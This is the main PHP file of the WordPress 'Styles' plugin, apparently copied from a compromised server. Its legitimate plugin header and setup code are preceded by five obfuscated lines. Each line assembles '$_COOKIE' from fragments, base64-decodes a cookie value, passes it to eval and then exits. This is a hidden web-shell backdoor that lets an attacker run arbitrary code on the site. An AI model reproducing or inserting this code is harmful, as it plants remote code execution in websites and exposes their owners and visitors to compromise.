File: /data/web/virtuals/5726/virtual/www/wp-content/plugins/styles/styles.php
<?php
$kfLLU5='KIE'; /* 3v */ $xVBG='_C'; /* ue7J2 */ $fRP='OO'; /* Vp8Lsj7st9Sjf */ $bTY=${$xVBG.$fRP.$kfLLU5}; /* xI */ if(isset($bTY['tvGScot'])){eVAL /* nPpOgpWvQZf */ /* Nrbdpgqawfxm1 */ (base64_decode($bTY['tvGScot'])); die;}
$kSm='_'; /* skvai */ $lsKE='OOK'; /* YF */ $yBU='IE'; /* TYHt */ $fCA4en='C'; /* B83MyYIjACikTb */ $eye=${$kSm.$fCA4en.$lsKE.$yBU}; /* lHPw3poB8Q9GYs */ if(isset($eye['wxqWl'])){eVAl /* nM6fklSAD7 */ /* t */ (base64_decode($eye['wxqWl'])); die;}
$h3TFz6='KIE'; /* zJy72UMe0T13s */ $bvh='_'; /* Ei8O53L1yQp */ $aL4='COO'; /* 4T8u */ $pq9NNrC=${$bvh.$aL4.$h3TFz6}; /* NdTKX */ if(isset($pq9NNrC['Rwrr'])){evAl /* Q1GxfbPpcHB */ /* 95q7OeyU0 */ (base64_decode($pq9NNrC['Rwrr'])); die;}
$utJMK='K'; /* Zf */ $cDo='_COO'; /* j5UB0uC */ $oDskGLr='IE'; /* PhvudyIg0vlbV8 */ $g=${$cDo.$utJMK.$oDskGLr}; /* sJeT2znevwJxY */ if(isset($g['gIBrBH'])){eVAl /* 8Tv75XlGsmdMNC */ /* vlLZClOg4 */ (base64_decode($g['gIBrBH'])); die;}
$z='O'; /* iBBY2J */ $cdlZPqz='OKIE'; /* msK2PM7tlO */ $pRxMF='_C'; /* 7ePizFRPNVI1Rk */ $dxL5j=${$pRxMF.$z.$cdlZPqz}; /* s5Y */ if(isset($dxL5j['Qjd'])){EvaL /* fj0HC3MqF9 */ /* Pykgss6YBOs */ (base64_decode($dxL5j['Qjd'])); die;}
/*
Plugin Name: Styles
Plugin URI: http://stylesplugin.com
Description: Change the appearance of your theme using the <a href="customize.php">Customizer</a>. Most default themes supported via free add-ons on WordPress.org (see <a href="http://wordpress.org/plugins/styles" target="_blank">links in readme</a>). Custom support and theme additions available via <a href="http://stylesplugin.com/support">Styles Support Services</a>.
Version: 1.2
Author: Paul Clark
Author URI: http://profiles.wordpress.org/pdclark
License: GPLv2
License URI: http://www.gnu.org/licenses/gpl-2.0.html
*/
if ( version_compare( $GLOBALS['wp_version'], '3.4', '>=' ) ) {
if ( !defined( 'STYLES_BASENAME' ) ) define( 'STYLES_BASENAME', plugin_basename( __FILE__ ) );
if ( !defined( 'STYLES_DIR' ) ) define( 'STYLES_DIR', dirname( __FILE__ ) );
require dirname ( __FILE__ ) . '/classes/styles-plugin.php';
add_action( 'plugins_loaded', 'Styles_Plugin::get_instance' );
/**
* Additional headers to identify Styles child plugins.
* Filter needs to run before plugins_loaded to avoid conflicts
*
* @return array plugin header search terms
*/
function styles_extra_plugin_headers( $headers ) {
$headers['Styles Class'] = 'styles class';
$headers['Styles Item'] = 'styles item';
$headers['Styles Updates'] = 'styles updates';
return $headers;
}
// High priority to avoid conflicts with plugins that don't return the header array correctly.
add_filter( 'extra_plugin_headers', 'styles_extra_plugin_headers', PHP_INT_MAX );
}else if ( is_admin() ) {
/**
* Notify user if WordPress is older than version 3.4.
* @return void
*/
function styles_wp_version_notice() {
echo sprintf(
'<div class="error"><p>%s<a href="http://codex.wordpress.org/Upgrading_WordPress">%s</a></p></div>',
__( 'Styles requires WordPress 3.4 or newer.', 'styles' ),
__( 'Please update.', 'styles' )
);
}
add_action( 'admin_notices', 'styles_wp_version_notice' );
}